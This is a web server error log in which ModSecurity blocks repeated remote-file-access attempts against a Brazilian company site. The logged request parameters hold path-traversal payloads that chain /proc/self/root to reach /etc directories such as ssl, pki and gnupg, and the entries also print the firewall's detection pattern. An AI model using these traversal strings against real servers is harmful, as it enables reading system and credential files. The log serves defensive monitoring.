[Tue Mar 17 09:48:24.129254 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.46:53924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNmAeiSKl8TjouI-YEZQAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:48:25.530729 2026] [:error] [pid 2553:tid 140411725141760] [client 74.7.241.46:53934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNmf0Bec_B9OkZP_i_VgAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:48:36.353915 2026] [:error] [pid 11469:tid 140411699963648] [client 74.7.241.46:53940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNpJDEJR9VXonE_-1R_QAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:48:40.512017 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.46:44116] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNqAeiSKl8TjouI-YEcwAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:48:46.491826 2026] [:error] [pid 2159:tid 140411616036608] [client 74.7.243.203:52736] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNrvct6CQ8jnRyg2p-bgAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:48:54.699390 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.203:53296] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNtgeiSKl8TjouI-YEgAAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:59.851687 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.243.203:42408] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNu9CmCSWTlPouqorOQgAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:49:02.484651 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.228.16:53374] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablNvqBJNF7axNlVR0X_IwAAABQ"]
[Tue Mar 17 09:49:03.375442 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.241.46:34082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNv-82sZHvlq4xgHrFUQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:49:04.729060 2026] [:error] [pid 1210:tid 140411699963648] [client 74.7.241.46:53884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNwFKJy4A1bGlmj9BX9AAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:49:05.905707 2026] [:error] [pid 11469:tid 140411716749056] [client 74.7.241.46:53888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNwZDEJR9VXonE_-1SDwAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:50:39.968615 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.243.203:36724] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOH5qmL8PQht4WJFlLJgAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:50:44.452880 2026] [:error] [pid 1210:tid 140411624429312] [client 74.7.243.203:38894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOJFKJy4A1bGlmj9BYNAAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:50:45.764614 2026] [:error] [pid 11469:tid 140411616036608] [client 74.7.243.203:38902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOJZDEJR9VXonE_-1SSAAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:50:53.500457 2026] [:error] [pid 11469:tid 140411691570944] [client 74.7.243.203:38912] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOLZDEJR9VXonE_-1SWAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:50:54.837592 2026] [:error] [pid 2553:tid 140411699963648] [client 74.7.243.203:40434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOLv0Bec_B9OkZP_i_owAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:50:56.556751 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.241.46:53902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOLtCmCSWTlPouqorOwgAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:50:57.920022 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.241.46:58940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOMZqmL8PQht4WJFlLMAAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:50:59.095893 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.241.46:45124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOM6BJNF7axNlVR0X_qwAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:51:09.379237 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.241.46:45134] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOPe82sZHvlq4xgHrFmgAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:51:12.927709 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.46:44686] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOQAeiSKl8TjouI-YE3QAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:51:15.527037 2026] [:error] [pid 11293:tid 140411733534464] [client 74.7.241.46:44688] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOQ9CmCSWTlPouqorOygAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
